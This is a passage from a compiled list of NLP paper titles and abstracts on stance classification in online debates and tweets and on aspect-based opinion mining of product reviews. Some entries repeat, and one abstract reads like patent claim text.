the ANES and the four domains of the “Ideological Debates” datasets. Moreover combining both feature sets outperforms a stronger unigram-only classification system. --- paper_title: The Berkeley FrameNet Project paper_content: FrameNet is a three-year NSF-supported project in corpus-based computational lexicography, now in its second year (NSF IRI-9618838, "Tools for Lexicon Building"). The project's key features are (a) a commitment to corpus evidence for semantic and syntactic generalizations, and (b) the representation of the valences of its target words (mostly nouns, adjectives, and verbs) in which the semantic portion makes use of frame semantics. The resulting database will contain (a) descriptions of the semantic frames underlying the meanings of the words described, and (b) the valence representation (semantic and syntactic) of several thousand words and phrases, each accompanied by (c) a representative collection of annotated corpus attestations, which jointly exemplify the observed linkings between "frame elements" and their syntactic realizations (e.g. grammatical function, phrase type, and other syntactic traits). This report will present the project's goals and workflow, and information about the computational tools that have been adapted or created in-house for this work. --- paper_title: Frame Semantics for Stance Classification paper_content: Determining the stance expressed by an author from a post written for a two-sided debate in an online debate forum is a relatively new problem in opinion mining. We extend a state-of-the-art learningbased approach to debate stance classification by (1) inducing lexico-syntactic patterns based on syntactic dependencies and semantic frames that aim to capture the meaning of a sentence and provide a generalized representation of it; and (2) improving the classification of a test post via a novel way of exploiting the information in other test posts with the same stance. Empirical results on four datasets demonstrate the effectiveness of our extensions. --- paper_title: Stance Mining for Online Debate Posts Using Part-of-Speech (POS) Tags Frequency paper_content: Online social media have immense data day after day because online users to connect each other, build their community, share their attitudes and publish their opinions. The users have become an important source of content. One of the most social media platforms is online debate forums which allow the users to express their attitude and their feelings towards the different issues. The debate post is informal language and non-standard expressions are very used, and many spelling errors are found due to absence of correctness verification. Our goal is to use the results of applying stance mining in public area the attempt at automatically collecting user's attitudes from the political debate forum where opinions towards public issues are found for government or political organizations to make decisions. This paper presents the linguistic features combining the part-of-speech (POS) tagging features with tf-idf weights different from ordinary features in stance classification and gets a good accuracy. --- paper_title: Cats Rule and Dogs Drool!: Classifying Stance in Online Debate paper_content: A growing body of work has highlighted the challenges of identifying the stance a speaker holds towards a particular topic, a task that involves identifying a holistic subjective disposition. We examine stance classification on a corpus of 4873 posts across 14 topics on ConvinceMe.net, ranging from the playful to the ideological. We show that ideological debates feature a greater share of rebuttal posts, and that rebuttal posts are significantly harder to classify for stance, for both humans and trained classifiers. We also demonstrate that the number of subjective expressions varies across debates, a fact correlated with the performance of systems sensitive to sentiment-bearing terms. We present results for identifing rebuttals with 63% accuracy, and for identifying stance on a per topic basis that range from 54% to 69%, as compared to unigram baselines that vary between 49% and 60%. Our results suggest that methods that take into account the dialogic context of such posts might be fruitful. --- paper_title: Unsupervised stance classification in online debates paper_content: This paper proposes an unsupervised debate stance classification algorithm. In other words, finding the side a post author is taking in an online debate. Stance detection has a complementary role in information retrieval, opinion mining, text summarization, etc. Existing stance detection techniques are not able to effectively handle two challenges: determine whether a given post is a debate or not? If the post is a debate on a given topic, correctly classify the side that the post author is taking. In this paper, we propose techniques that addresses both the above issues. Compared to existing technique, our technique gives 30% improvement in detection of whether a post is a debate or not. Our technique is able to find the side that an author is taking in a debate by 10% higher F1 score compared to existing work. We achieve this improvement by using new syntactic rules, better aspect popularity detection, co-reference resolution, and a novel integer linear programming model to solve the problem. --- paper_title: Generating Typed Dependency Parses from Phrase Structure Parses paper_content: This paper describes a system for extracting typed dependency parses of English sentences from phrase structure parses. In order to capture inherent relations occurring in corpus texts that can be critical in real-world applications, many NP relations are included in the set of grammatical relations used. We provide a comparison of our system with Minipar and the Link parser. The typed dependency extraction facility described here is integrated in the Stanford Parser, available for download. --- paper_title: Joint Models of Disagreement and Stance in Online Debate paper_content: Online debate forums present a valuable opportunity for the understanding and modeling of dialogue. To understand these debates, a key challenge is inferring the stances of the participants, all of which are interrelated and dependent. While collectively modeling users’ stances has been shown to be effective (Walker et al., 2012c; Hasan and Ng, 2013), there are many modeling decisions whose ramifications are not well understood. To investigate these choices and their effects, we introduce a scalable unified probabilistic modeling framework for stance classification models that 1) are collective, 2) reason about disagreement, and 3) can model stance at either the author level or at the post level. We comprehensively evaluate the possible modeling choices on eight topics across two online debate corpora, finding accuracy improvements of up to 11.5 percentage points over a local classifier. Our results highlight the importance of making the correct modeling choices for online dialogues, and having a unified probabilistic modeling framework that makes this possible. --- paper_title: Stance Classification of Ideological Debates: Data, Models, Features, and Constraints paper_content: Determining the stance expressed in a post written for a two-sided debate in an online debate forum is a relatively new and challenging problem in opinion mining. We seek to gain a better understanding of how to improve machine learning approaches to stance classification of ideological debates, specifically by examining how the performance of a learning-based stance classification system varies with the amount and quality of the training data, the complexity of the underlying model, the richness of the feature set, as well as the application of extra-linguistic constraints. --- paper_title: Stance Classification using Dialogic Properties of Persuasion paper_content: Public debate functions as a forum for both expressing and forming opinions, an important aspect of public life. We present results for automatically classifying posts in online debate as to the position, or stance that the speaker takes on an issue, such as Pro or Con. We show that representing the dialogic structure of the debates in terms of agreement relations between speakers, greatly improves performance for stance classification, over models that operate on post content and parent-post context alone. --- paper_title: Modeling User Arguments, Interactions, and Attributes for Stance Prediction in Online Debate Forums paper_content: Online debate forums are important social media for people to voice their opinions and debate with each other. Mining user stances or viewpoints from these forums has been a popular research topic. However, most current work does not address an important problem: for a specific issue, there may not be many users participating and expressing their opinions. Despite the sparsity of user stances, users may provide rich side information; for example, users may write arguments to back up their stances, interact with each other, and provide biographical information. In this work, we propose an integrated model to leverage side information. Our proposed method is a regression-based latent factor model which jointly models user arguments, interactions, and attributes. Our method can perform stance prediction for both warm-start and cold-start users. We demonstrate in experiments that our method has promising results on both micro-level and macro-level stance prediction. --- paper_title: Collective Stance Classification of Posts in Online Debate Forums paper_content: Online debate sites are a large source of informal and opinion-sharing dialogue on current socio-political issues. Inferring users’ stance (PRO or CON) towards discussion topics in domains such as politics or news is an important problem, and is of utility to researchers, government organizations, and companies. Predicting users’ stance supports identification of social and political groups, building of better recommender systems, and personalization of users’ information preferences to their ideological beliefs. In this paper, we develop a novel collective classification approach to stance classification, which makes use of both structural and linguistic features, and which collectively labels the posts’ stance across a network of the users’ posts. We identify both linguistic features of the posts and features that capture the underlying relationships between posts and users. We use probabilistic soft logic (PSL) (Bach et al., 2013) to model post stance by leveraging both these local linguistic features as well as the observed network structure of the posts to reason over the dataset. We evaluate our approach on 4FORUMS (Walker et al., 2012b), a collection of discussions from an online debate site on issues ranging from gun control to gay marriage. We show that our collective classification model is able to easily incorporate rich, relational information and outperforms a local model which uses only linguistic information. --- paper_title: A Short Introduction to Probabilistic Soft Logic paper_content: Probabilistic soft logic (PSL) is a framework for collective, probabilistic reasoning in relational domains. PSL uses first order logic rules as a template language for graphical models over random variables with soft truth values from the interval [0, 1]. Inference in this setting is a continuous optimization task, which can be solved efficiently. This paper provides an overview of the PSL language and its techniques for inference and weight learning. An implementation of PSL is available at http://psl.umiacs.umd.edu/. --- paper_title: JU_NLP at SemEval-2016 Task 6: Detecting Stance in Tweets using Support Vector Machines paper_content: We describe the system submitted to the SemEval-2016 for detecting stance in tweets (Task 6, Subtask A). One of the main goals of stance detection is to automatically determine the stance of a tweet towards a specific target as ‘FAVOR’, ‘AGAINST’, or ‘NONE’. We developed a supervised system using Support Vector Machines to identify the stance by analyzing various lexical and semantic features. The average F1 score achieved by our system is 60.60. --- paper_title: DeepStance at SemEval-2016 Task 6: Detecting Stance in Tweets Using Character and Word-Level CNNs paper_content: This paper describes our approach for the Detecting Stance in Tweets task (SemEval-2016 Task 6). We utilized recent advances in short text categorization using deep learning to create word-level and character-level models. The choice between word-level and character-level models in each particular case was informed through validation performance. Our final system is a combination of classifiers using word-level or character-level models. We also employed novel data augmentation techniques to expand and diversify our training dataset, thus making our system more robust. Our system achieved a macro-average precision, recall and F1-scores of 0.67, 0.61 and 0.635 respectively. --- paper_title: Recurrent neural network based language model paper_content: A new recurrent neural network based language model (RNN LM) with applications to speech recognition is presented. Results indicate that it is possible to obtain around 50% reduction of perplexity by using mixture of several RNN LMs, compared to a state of the art backoff language model. Speech recognition experiments show around 18% reduction of word error rate on the Wall Street Journal task when comparing models trained on the same amount of data, and around 5% on the much harder NIST RT05 task, even when the backoff model is trained on much more data than the RNN LM. We provide ample empirical evidence to suggest that connectionist language models are superior to standard n-gram techniques, except their high computational (training) complexity. Index Terms: language modeling, recurrent neural networks, speech recognition --- paper_title: MITRE at SemEval-2016 Task 6: Transfer Learning for Stance Detection paper_content: We describe MITRE's submission to the SemEval-2016 Task 6, Detecting Stance in Tweets. This effort achieved the top score in Task A on supervised stance detection, producing an average F1 score of 67.8 when assessing whether a tweet author was in favor or against a topic. We employed a recurrent neural network initialized with features learned via distant supervision on two large unlabeled datasets. We trained embeddings of words and phrases with the word2vec skip-gram method, then used those features to learn sentence representations via a hashtag prediction auxiliary task. These sentence vectors were then fine-tuned for stance detection on several hundred labeled examples. The result was a high performing system that used transfer learning to maximize the value of the available training data. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences. The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Multi-Target Stance Detection via a Dynamic Memory-Augmented Network paper_content: Stance detection aims at inferring from text whether the author is in favor of, against, or neutral towards a target entity. Most of the existing studies consider different target entities separately. However, in many scenarios, stance targets are closely related, such as several candidates in a general election and different brands of the same product. Multi-target stance detection, in contrast, aims at jointly detecting stances towards multiple related targets. As stance expression regarding a target can provide additional information to help identify the stances towards other related targets, modeling expressions regarding multiple targets jointly is beneficial for improving the overall performance compared to single-target scheme. In this paper, we propose a dynamic memory-augmented network DMAN for multi-target stance detection. DMAN utilizes a shared external memory, which is dynamically updated through the learning process, to capture and store stance-indicative information for multiple related targets. It then jointly predicts stances towards these targets in a multitask manner. Experimental results show the effectiveness of our DMAN model. --- paper_title: A Target-Guided Neural Memory Model for Stance Detection in Twitter paper_content: Exploring user stances and attitudes is beneficial to a number of Web related research and applications, especially in social media platforms such as Twitter. Stance detection in Twitter aims at identifying the stance expressed in a tweet towards a given target (e.g., a government policy). A key challenge of this task is that a tweet may not explicitly express opinion about the target. To effectively detect user stances implied in tweets, target content information plays an important role. In previous studies, conventional feature-based methods often ignore target content. Although more recent neural network-based methods attempt to integrate target information using attention mechanism, the performance improvement is rather limited due to the underuse of this information. To address this issue, we propose an endto- end neural model, TGMN-CR, which makes better use of target content information. Specifically, our model first learns conditional tweet representation with respect to specific target. It then employs a target-guided iterative process to extract crucial stance-indicative clues via multiple interactions between target and tweet words. Experimental results on SemEval-2016 Task 6.A Twitter Stance Detection dataset show that our proposed method outperforms the state-of-the-art alternative methods, and substantially outperforms the comparative methods when a tweet does not explicitly express opinion about the given target. --- paper_title: Connecting Targets to Tweets: Semantic Attention-Based Model for Target-Specific Stance Detection paper_content: Understanding what people say and really mean in tweets is still a wide open research question. In particular, understanding the stance of a tweet, which is determined not only by its content, but also by the given target, is a very recent research aim of the community. It still remains a challenge to construct a tweet’s vector representation with respect to the target, especially when the target is only implicitly mentioned, or not mentioned at all in the tweet. We believe that better performance can be obtained by incorporating the information of the target into the tweet’s vector representation. In this paper, we thus propose to embed a novel attention mechanism at the semantic level in the bi-directional GRU-CNN structure, which is more fine-grained than the existing token-level attention mechanism. This novel attention mechanism allows the model to automatically attend to useful semantic features of informative tokens in deciding the target-specific stance, which further results in a conditional vector representation of the tweet, with respect to the given target. We evaluate our proposed model on a recent, widely applied benchmark Stance Detection dataset from Twitter for the SemEval-2016 Task 6.A. Experimental results demonstrate that the proposed model substantially outperforms several strong baselines, which include the state-of-the-art token-level attention mechanism on bi-directional GRU outputs and the SVM classifier. --- paper_title: MITRE at SemEval-2016 Task 6: Transfer Learning for Stance Detection paper_content: We describe MITRE's submission to the SemEval-2016 Task 6, Detecting Stance in Tweets. This effort achieved the top score in Task A on supervised stance detection, producing an average F1 score of 67.8 when assessing whether a tweet author was in favor or against a topic. We employed a recurrent neural network initialized with features learned via distant supervision on two large unlabeled datasets. We trained embeddings of words and phrases with the word2vec skip-gram method, then used those features to learn sentence representations via a hashtag prediction auxiliary task. These sentence vectors were then fine-tuned for stance detection on several hundred labeled examples. The result was a high performing system that used transfer learning to maximize the value of the available training data. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Connecting Targets to Tweets: Semantic Attention-Based Model for Target-Specific Stance Detection paper_content: Understanding what people say and really mean in tweets is still a wide open research question. In particular, understanding the stance of a tweet, which is determined not only by its content, but also by the given target, is a very recent research aim of the community. It still remains a challenge to construct a tweet’s vector representation with respect to the target, especially when the target is only implicitly mentioned, or not mentioned at all in the tweet. We believe that better performance can be obtained by incorporating the information of the target into the tweet’s vector representation. In this paper, we thus propose to embed a novel attention mechanism at the semantic level in the bi-directional GRU-CNN structure, which is more fine-grained than the existing token-level attention mechanism. This novel attention mechanism allows the model to automatically attend to useful semantic features of informative tokens in deciding the target-specific stance, which further results in a conditional vector representation of the tweet, with respect to the given target. We evaluate our proposed model on a recent, widely applied benchmark Stance Detection dataset from Twitter for the SemEval-2016 Task 6.A. Experimental results demonstrate that the proposed model substantially outperforms several strong baselines, which include the state-of-the-art token-level attention mechanism on bi-directional GRU outputs and the SVM classifier. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Aspect Aware Optimized Opinion Analysis of Online Product Reviews paper_content: Now-a-days social media and micro blogging sites are the most popular form of communication. The most useful application on these platforms is Opinion mining or Sentiment classification of the users. Here, in this work an automated method has been proposed to analyze and summarize opinions on a product in a structured, product aspect based manner. The proposed method will help future potential buyers to acquire complete idea, from a comprehensible representation of the reviews, without going through all the reviews manually. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category. Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: An Unsupervised Neural Attention Model for Aspect Extraction paper_content: Methods, systems, and computer-readable storage media for receiving a vocabulary, the vocabulary including text data that is provided as at least a portion of raw data, the raw data being provided in a computer-readable file, associating each word in the vocabulary with a feature vector, providing a sentence embedding for each sentence of the vocabulary based on a plurality of feature vectors to provide a plurality of sentence embeddings, providing a reconstructed sentence embedding for each sentence embedding based on a weighted parameter matrix to provide a plurality of reconstructed sentence embeddings, and training the unsupervised neural attention model based on the sentence embeddings and the reconstructed sentence embeddings to provide a trained neural attention model, the trained neural attention model being used to automatically determine aspects from the vocabulary. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the ::: latent facets, sentiments and their associations. Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally,inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose aseries of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge. To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies ::: in the domain of review mining. Further, the concept of ::: facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real world review data show that the proposed models outperform various state of the art baselines for facet-based sentiment analysis. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before, are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract high detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Summarizing Opinions: Aspect Extraction Meets Sentiment Prediction and They Are Both Weakly Supervised paper_content: We present a neural framework for opinion summarization from online product reviews which is knowledge-lean and only requires light supervision (e.g., in the form of product domain labels and user-provided ratings). Our method combines two weakly supervised components to identify salient opinions and form extractive summaries from multiple reviews: an aspect extractor trained under a multi-task objective, and a sentiment predictor based on multiple instance learning. We introduce an opinion summarization dataset that includes a training set of product reviews from six diverse domains and human-annotated development and test sets with gold standard aspect annotations, salience labels, and opinion summaries. Automatic evaluation shows significant improvements over baselines, and a large-scale study indicates that our opinion summaries are preferred by human judges according to multiple criteria. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: Generalizing Syntactic Structures for Product Attribute Candidate Extraction paper_content: Noun phrases (NP) in a product review are always considered as the product attribute candidates in previous work. However, this method limits the recall of the product attribute extraction. We therefore propose a novel approach by generalizing syntactic structures of the product attributes with two strategies: intuitive heuristics and syntactic structure similarity. Experiments show that the proposed approach is effective. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: A Joint Model of Text and Aspect Ratings for Sentiment Summarization paper_content: Online reviews are often accompanied with numerical ratings provided by users for a set of service or product aspects. We propose a statistical model which is able to discover corresponding topics in text and extract textual evidence from reviews supporting each of these aspect ratings ‐ a fundamental problem in aspect-based sentiment summarization (Hu and Liu, 2004a). Our model achieves high accuracy, without any explicitly labeled data except the user provided opinion ratings. The proposed approach is general and can be used for segmentation in other applications where sequential data is accompanied with correlated signals. --- paper_title: An Approach Based on Tree Kernels for Opinion Mining of Online Product Reviews paper_content: Opinion mining is a challenging task to identify the opinions or sentiments underlying user generated contents, such as online product reviews, blogs, discussion forums, etc. Previous studies that adopt machine learning algorithms mainly focus on designing effective features for this complex task. This paper presents our approach based on tree kernels for opinion mining of online product reviews. Tree kernels alleviate the complexity of feature selection and generate effective features to satisfy the special requirements in opinion mining. In this paper, we define several tree kernels for sentiment expression extraction and sentiment classification, which are subtasks of opinion mining. Our proposed tree kernels encode not only syntactic structure information, but also sentiment related information, such as sentiment boundary and sentiment polarity, which are important features to opinion mining. Experimental results on a benchmark data set indicate that tree kernels can significantly improve the performance of both sentiment expression extraction and sentiment classification. Besides, a linear combination of our proposed tree kernels and traditional feature vector kernel achieves the best performances using the benchmark data set. --- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences’ dependency information is critical and has been widely used for opinion mining. With recent success of deep learning in natural language processing (NLP), recurrent neural network (RNN) has been proposed for aspect term extraction and shows the superiority over feature-rich CRFs based models. However, because RNN is a sequential model, it can not effectively capture tree-based dependency information of sentences thus limiting its practicability. In order to effectively exploit sentences’ dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences’ dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on SemEval2014 Task4 datasets (reviews on restaurant and laptop domain) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: Mining Opinion Features in Customer Reviews. paper_content: Now days, E-commerce systems have become extremely important. Large numbers of customers are choosing online shopping because of its convenience, reliability, and cost. Client generated information and especially item reviews are significant sources of data for consumers to make informed buy choices and for makers to keep track of customer’s opinions. It is difficult for customers to make purchasing decisions based on only pictures and short product descriptions. On the other hand, mining product reviews has become a hot research topic and prior researches are mostly based on pre-specified product features to analyse the opinions. Natural Language Processing (NLP) techniques such as NLTK for Python can be applied to raw customer reviews and keywords can be extracted. This paper presents a survey on the techniques used for designing software to mine opinion features in reviews. Elven IEEE papers are selected and 